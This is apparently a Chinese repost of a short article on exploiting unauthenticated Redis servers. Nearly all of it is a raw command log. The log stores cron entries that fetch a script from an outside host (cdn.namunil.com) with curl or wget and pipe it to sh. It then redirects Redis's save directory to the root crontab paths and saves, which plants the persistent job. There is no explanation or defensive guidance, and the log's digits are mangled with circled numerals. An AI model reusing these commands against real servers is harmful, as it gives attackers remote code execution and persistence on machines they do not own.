Login
网站首页 > 文章中心 > 其它

[日常] 研究redis未授权访问漏洞利用过程

作者:小编 更新时间:2023-08-11 07:35:30 浏览量:229人看过

[日常] 研究redis未授权访问漏洞利用过程-图1

前提:redis允许远程连接,不需要密码

152205749⑤583846 [0 12③20⑥2④121:50084] "set" "dUHkp" "\n\n*/1 * * * * curl cdn.namunil.com/sh.php|sh\n"
152205749⑤584467 [0 12③20⑥2④121:50084] "set" "yA" "\n\n*/2 * * * * wget -O- cdn.namunil.com/sh.php|sh\n"
152205749⑤585023 [0 12③20⑥2④121:50084] "set" "HoemuOP" "\n\n*/3 * * * * /usr/bin/curl -qs cdn.namunil.com/sh.php|/bin/sh\n"
152205749⑤585650 [0 12③20⑥2④121:50084] "set" "ehWap" "\n\n*/4 * * * * /usr/bin/wget -q -O- cdn.namunil.com/sh.php|/bin/sh\n"
152205749⑤586313 [0 12③20⑥2④121:50084] "config" "set" "dir" "/var/spool/cron/"
152205749⑤587036 [0 12③20⑥2④121:50084] "config" "set" "dbfilename" "root"
152205749⑤587374 [0 12③20⑥2④121:50084] "save"
152205749⑤587827 [0 12③20⑥2④121:50084] "config" "set" "dir" "/var/spool/cron/crontabs/"
152205749⑤588235 [0 12③20⑥2④121:50084] "save"

以上就是土嘎嘎小编为大家整理的[日常] 研究redis未授权访问漏洞利用过程相关主题介绍,如果您觉得小编更新的文章只要能对粉丝们有用,就是我们最大的鼓励和动力,不要忘记讲本站分享给您身边的朋友哦!!

版权声明:倡导尊重与保护知识产权。未经许可,任何人不得复制、转载、或以其他方式使用本站《原创》内容,违者将追究其法律责任。本站文章内容,部分图片来源于网络,如有侵权,请联系我们修改或者删除处理。

编辑推荐

热门文章